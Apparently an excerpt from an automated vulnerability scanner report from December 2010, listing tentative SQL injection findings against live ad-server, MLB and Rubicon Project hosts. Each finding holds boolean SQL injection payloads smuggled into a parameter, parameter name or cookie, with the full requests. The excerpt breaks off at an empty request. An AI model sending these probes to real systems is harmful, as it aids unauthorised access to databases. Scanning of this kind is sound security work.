GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d1--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:25:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=brjll816ftk3i&t=1291767922;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19323


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ptelbu/M=601052417.601382328.486678551.521401551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=a4c20eea-0261-11e0-b32b-8bc683dc0e5f/B=60i0AdFJo9I-/J=1291767922103155/K=0EUsCN3j_fF_fLcH0QO9sA/EXP=1291775122/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=a4c20eea-0261-11e0-b32b-8bc683dc0e5f&T=19evnuhi7%2fX%3d1291767922%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2682159267%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSJhNGMyMGVlYS0wMjYxLTExZTAtYjMyYi04YmM2ODNkYzBlNWYiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzkyMjAzNzAyNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d9B890D4C&U=13uv15qm6%2fN%3d60i0AdFJo9I-%2fC%3d601052417.601382328.486678551.521401551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|a4c20eea-0261-11e0-b32b-8bc683dc0e5f--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.521401551--><!--fac4.cl1.ads.adx.ac4.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHA5bXFndihnaWQkYTRjMjBlZWEtMDI2MS0xMWUwLWIzMmItOGJjNjgzZGMwZTVmLHN0JDEyOTE3Njc5MjIwMzcwMjQsc2kkMjExMDUxLHYkMS4wLGFpZCRGdHhyS1V3Tmlacy0sY3QkMjUseWJ4JDdhZFJyXzJxWDNxWGUxLmlLYzNINmcsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width
...[SNIP]...

Request 2

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d2--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336; S=s=3037rkh6ftelv&t=1291762367

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:25:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=0lbrjth6ftk3i&t=1291767922;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19333


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=1630pfmo8/M=600996958.601271502.459798051.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=a50980ea-0261-11e0-bcf7-af2f570c8c0a/B=8Yv6BdFJpB0-/J=1291767922561936/K=0EUsCN3j_fF_fLcH0QO9sA/EXP=1291775122/A=1974817592210663262/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=a50980ea-0261-11e0-bcf7-af2f570c8c0a&T=19e82bipl%2fX%3d1291767922%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3722408356%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSJhNTA5ODBlYS0wMjYxLTExZTAtYmNmNy1hZjJmNTcwYzhjMGEiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzkyMjUwNTY0MCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d24558862&U=13ucmp3m1%2fN%3d8Yv6BdFJpB0-%2fC%3d600996958.601271502.459798051.475726551%2fD%3dAP15%2fB%3d1974817592210663262%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|a50980ea-0261-11e0-bcf7-af2f570c8c0a--><!--TRK:a:1974817592210663262,m:600996958.601271502.459798051.475726551--><!--fac14.cl1.ads.adx.ac4.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
{"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGxxYTBuaihnaWQkYTUwOTgwZWEtMDI2MS0xMWUwLWJjZjctYWYyZjU3MGM4YzBhLHN0JDEyOTE3Njc5MjI1MDU2NDAsc2kkMjExMDUxLHYkMS4wLGFpZCQ0dEx6ZUdLSVZTUS0sY3QkMjUseWJ4JDdhZFJyXzJxWDNxWGUxLmlLYzNINmcsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" widt
...[SNIP]...

1.121. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sanfrancisco.giants.mlb.com
Path:   /index.jsp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 86828936%20or%201%3d1--%20 and 86828936%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.jsp?c_id=sf&186828936%20or%201%3d1--%20=1 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=599
Expires: Wed, 08 Dec 2010 01:22:45 GMT
Date: Wed, 08 Dec 2010 01:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139605


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div class="stat_type matchupSchedBg">STRIKEOUTS</div>
<div class="name_num">
<div class="stat_name">
<a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=453311">Lincecum</a>
</div>
<div class="stat_num">231</div>
</div>
</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=456043">Sanchez</a>
</div>
<div class="other_num">205</div>
</div>
<div class="other_leader">
<div class="other_name">3.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=430912">Cain</a>
</div>
<div class="other_num">177</div>
</div>
</div>

   
   <span class="more"><a href="/stats/sortable_player_stats.jsp?c_id=sf&baseballScope=sfn&subScope=pos&teamPosCode=all&statType=Overview&timeSubFrame=2010&sitSplit=&venueID=&Submit=Submit&timeFrame=1" >View Complete Stats</a></span>
</div>
</div>                                                
                       
                       <div class="h_module_content">





<style>

/* STANDINGS */
#standings_container { }
#standings_container #standingsBg {background:url(/images/homepage/y2008/bg_200x290.png) no-repeat; height:290px}
*html #standingsBg {behavior: url(/scripts/fix_png_bg.htc); }
#standings_container #stand_head { display: block; padding-top: 6px; margin-left: 6px; }
#standings_data, #wildcard_data { height:266px; overflow: hidden; }
/* *html #standings_data, #wildcard_data {height: 275px;} */
#standings_container .standings_data_table { width: 186px; }
.standings_data_table th, .standings_data_table td {border-bottom:1px solid #DDDDDD;border-spacing:0;font-size:11px; text-align:center; }
.standings_data_table td.alignLeft, .standings_data_table th.alignLeft {text-align:left; padding-left:3px}
#standings_container .standings_extended{margin-left:15px; font-size: 11px;}
#standings_container .standings_clinch {font-size:11px; margin:0 0 20px 15px;height:45px; display:none;}
#standings_container #standings_link { margin-top:0px; height:14px; font-size:11px;}
#standings_container .standings_mn im
...[SNIP]...

Request 2

GET /index.jsp?c_id=sf&186828936%20or%201%3d2--%20=1 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=599
Expires: Wed, 08 Dec 2010 01:22:46 GMT
Date: Wed, 08 Dec 2010 01:12:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139595


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<div class="stat_type matchupSchedBg">WINS</div>
<div class="name_num">
<div class="stat_name">
<a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=453311">Lincecum</a>
</div>
<div class="stat_num">16</div>
</div>
</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=430912">Cain</a>
</div>
<div class="other_num">13</div>
</div>
<div class="other_leader">
<div class="other_name">2.
               <a href="http://mlb.mlb.com/stats/individual_stats_player.jsp?c_id=sf&playerID=456043">Sanchez</a>
</div>
<div class="other_num">13</div>
</div>
</div>

   
   <span class="more"><a href="/stats/sortable_player_stats.jsp?c_id=sf&baseballScope=sfn&subScope=pos&teamPosCode=all&statType=Overview&timeSubFrame=2010&sitSplit=&venueID=&Submit=Submit&timeFrame=1" >View Complete Stats</a></span>
</div>
</div>                                                
                       
                       <div class="h_module_content">





<style>

/* STANDINGS */
#standings_container { }
#standings_container #standingsBg {background:url(/images/homepage/y2008/bg_200x290.png) no-repeat; height:290px}
*html #standingsBg {behavior: url(/scripts/fix_png_bg.htc); }
#standings_container #stand_head { display: block; padding-top: 6px; margin-left: 6px; }
#standings_data, #wildcard_data { height:266px; overflow: hidden; }
/* *html #standings_data, #wildcard_data {height: 275px;} */
#standings_container .standings_data_table { width: 186px; }
.standings_data_table th, .standings_data_table td {border-bottom:1px solid #DDDDDD;border-spacing:0;font-size:11px; text-align:center; }
.standings_data_table td.alignLeft, .standings_data_table th.alignLeft {text-align:left; padding-left:3px}
#standings_container .standings_extended{margin-left:15px; font-size: 11px;}
#standings_container .standings_clinch {font-size:11px; margin:0 0 20px 15px;height:45px; display:none;}
#standings_container #standings_link { margin-top:0px; height:14px; font-size:11px;}
#standings_container .standings_mn img {margin
...[SNIP]...

1.122. http://tap.rubiconproject.com/oz/sensor [au cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4'%20and%201%3d1--%20; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:03 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:03 GMT; Path=/
Set-Cookie: dq=11|1|10|0; Expires=Thu, 08-Dec-2011 00:32:03 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4'%20and%201%3d2--%20; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:03 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.123. http://tap.rubiconproject.com/oz/sensor [cd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=62&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,silicon+valley:40,mercury:40,news+silicon:40,high+speed:40,chrome+os:40,bay+area:40,news+breaking:40,breaking+news:40,local+events:40,rosies+posie:32,clara+county:32,san+francisco:32,santa+clara:32,speed+rail:32,biz+break:32,os+notebook:28,los+gatos:24,site+map:24,area+living:24,real+estate:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,breaking+new:20,local+event:20,newspaper:16,delivery:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; cd=false'%20and%201%3d1--%20; dq=9|1|8|0; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=441745.js^1^1291762372^1291762372

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:18 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:18 GMT; Path=/
Set-Cookie: dq=10|1|9|0; Expires=Thu, 08-Dec-2011 00:32:18 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

